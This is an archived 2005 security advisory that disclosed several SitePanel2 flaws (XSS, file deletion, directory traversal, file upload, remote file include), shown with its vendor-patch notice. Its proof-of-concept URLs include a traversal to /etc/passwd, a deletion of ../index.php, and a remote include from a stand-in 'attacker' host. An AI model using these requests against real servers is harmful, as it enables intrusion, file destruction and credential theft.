exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sitepanel2.txt

sitepanel2.txt
Posted Jul 13, 2005
Authored by James Bercegay | Site gulftech.org

Sitepanel2 versions 2.6.1 and below suffer from cross site scripting, directory traversal, and various file manipulation flaws.

tags | exploit, xss
SHA-256 | bf1bec8fd01bb8241debc401e8eb81f226ce350eea7f6f5ab751654f1137bcfb

sitepanel2.txt

Change Mirror Download
##########################################################
# GulfTech Security Research May 3rd, 2005
##########################################################
# Vendor : Morgan Harvey
# URL : http://www.sitepanel2.com/
# Version : 2.6.1 And Earlier
# Risk : Multiple Vulnerabilities
##########################################################



Description:
SitePanel2 is a helpdesk / trouble ticket / support system used
by businesses and individuals alike. There are a number of
vulnerabilities in SitePanel2, some of which are fairly serious.
If an attacker is able to successfully exploit these vulnerabilities
in SitePanel2 he may be able to successfully compromise user accounts
or completely compromise the target web server. A security patch has
been released to address these issues and all users are strongly
encouraged to upgrade their SitePanel2 installations as soon as
possible.



Cross Site Scripting:
Cross site scripting exists in SitePanel2. This vulnerability exists
due to user supplied input not being checked properly.

http://host/users/main.php?p=5&do=2&v=177%22%3E[XSS]
http://host/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://host/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
http://host/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://host/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
http://host/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://host/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]

This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile
code in a victim's browser.



Arbitrary File Deletion:
I found an arbitrary file deletion issue, which depending on server
permissions may allow an attacker to delete any file on the server.

http://host/admin/5.php?do=rmattach&rm=yes&id=../index.php

Even if the server is running as nobody you can still delete any and
all attachments you know the name of.



Directory Traversal Vulnerability:
Also, there is a local file include vulnerability. An attacker may specify
directory traversal sequences when calling the "lang" parameter and include
arbitrary files residing on the local machine.

http://host/users/index.php?lang=en.inc/../../../../../../etc/passwd%00

This issue can be used to read arbitrary files, or include and execute
arbitrary local files.



Arbitrary File Upload:
Nothing very technical here, but an attacker can upload malicious files
such as php scripts when attaching them to a trouble ticket and execute
them with the privileges of the target web server.



Remote File Include Vulnerability:
SitePanel2 is prone to both remote and local file include vulnerabilities
which may allow for an attacker to execute arbitrary commands on the victim
webserver by including malicious files.

http://host/users/main.php?p=http://attacker

Above is an example of how this issue could be exploited. The problem lies
in the way the "p" parameter is called. It is clearly not sanitized and can
be used to include arbitrary files from a remote location.



Solution:
The developer was contacted some months ago and a new version can be found
here http://forum.sitepanel2.com/index.php?showtopic=271



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00072-05032005



Credits:
James Bercegay of the GulfTech Security Research Team
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close